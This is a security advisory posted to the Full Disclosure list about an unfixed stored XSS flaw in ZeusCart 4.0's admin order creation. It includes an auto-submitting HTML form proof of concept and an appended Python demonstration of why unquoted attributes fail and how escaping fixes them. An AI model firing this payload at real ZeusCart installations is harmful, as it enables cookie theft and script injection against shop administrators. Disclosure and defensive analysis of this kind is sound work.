Message-ID: <55F6F352.9030504@curesec.com>
Date: Mon, 14 Sep 2015 18:18:26 +0200
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] ZeusCart 4.0 - XSS - not fixed

ZeusCart 4.0: XSS
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: ZeusCart 4.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@...scart.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability via the "txtstreet" POST parameter when adding a new order. With this, it is possible to steal cookies or inject JavaScript keyloggers.

3. Proof of Concept

<form name="myform" method="post" action="http://localhost/zeuscart-master/admin/index.php?do=addUserOrder&action=create" >
    <input type="hidden" name="hidOrderTotal" value="400">
    <input type="hidden" name="discount" value="flat">
    <input type="hidden" name="selCustomer" value="1">
    <input type="hidden" name="payOption" value="8">
    <input type="hidden" name="txtname" value="Primary">
    <input type="hidden" name="txtstreet" value="foo autofocus onfocus=alert(1); bar">
</form>
<script>document.myform.submit();</script>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public

6. Blog Reference

http://blog.curesec.com/article/blog/ZeusCart-40-XSS-55.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
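The shape of the PoC payload ("foo autofocus onfocus=alert(1); bar", with no quote characters) indicates that the stored street value lands in an HTML attribute that the page emits without quotes, so the spaces in the value become attribute separators and the browser tokenizes a new onfocus handler. The following is an added example, not code from the advisory or from ZeusCart: it runs the payload through an HTML tokenizer twice, once interpolated into a constructed unquoted attribute (the assumed vulnerable rendering) and once into a quoted, HTML-escaped attribute (the fix the vendor did not ship), and shows what attributes each rendering actually produces. The txtstreet field name and the payload are the advisory's; the surrounding input markup is an assumption.

```python
"""Added example (not from the advisory or from ZeusCart).

Shows why the advisory's txtstreet payload executes when echoed into an
unquoted HTML attribute, and why quoting plus HTML-escaping the value
stops it. The <input> markup below is a constructed assumption about how
the value is rendered; only the field name and payload come from the page.
"""
import html
from html.parser import HTMLParser

# Payload taken from the advisory's PoC (value of the txtstreet parameter).
PAYLOAD = "foo autofocus onfocus=alert(1); bar"


class AttrCollector(HTMLParser):
    """Records the attributes of each start tag as the tokenizer sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def render_unsafe(value):
    """Constructed vulnerable rendering: raw value in an unquoted attribute."""
    return f'<input type="text" name="txtstreet" value={value}>'


def render_safe(value):
    """Hardened rendering: quoted attribute, value HTML-escaped.

    quote=True also encodes the quote characters, so a value can never
    terminate the attribute it sits in. The PHP equivalent is
    htmlspecialchars($value, ENT_QUOTES, 'UTF-8') inside a quoted attribute.
    """
    return f'<input type="text" name="txtstreet" value="{html.escape(value, quote=True)}">'


def attributes_of(markup):
    """Tokenize a fragment and return the attribute dict of its first tag."""
    parser = AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags[0][1]


def event_handler_attrs(attrs):
    """Names of on* attributes the tokenizer produced; any of them means script runs."""
    return sorted(name for name in attrs if name.startswith("on"))


if __name__ == "__main__":
    unsafe = attributes_of(render_unsafe(PAYLOAD))
    safe = attributes_of(render_safe(PAYLOAD))
    # Unquoted: the single value splits into value=foo, autofocus, onfocus=alert(1);, bar.
    print("unquoted attribute :", unsafe)
    # Quoted + escaped: one value attribute holding the whole string, no handlers.
    print("quoted, escaped    :", safe)
```

The unquoted rendering yields four attributes from one field, including an onfocus handler that autofocus triggers on page load, which is exactly the behaviour the PoC relies on; the quoted and escaped rendering yields a single value attribute containing the whole string. Quoting alone would defeat this particular payload, but without escaping a value containing a quote character could still close the attribute, so both measures belong together in the fix.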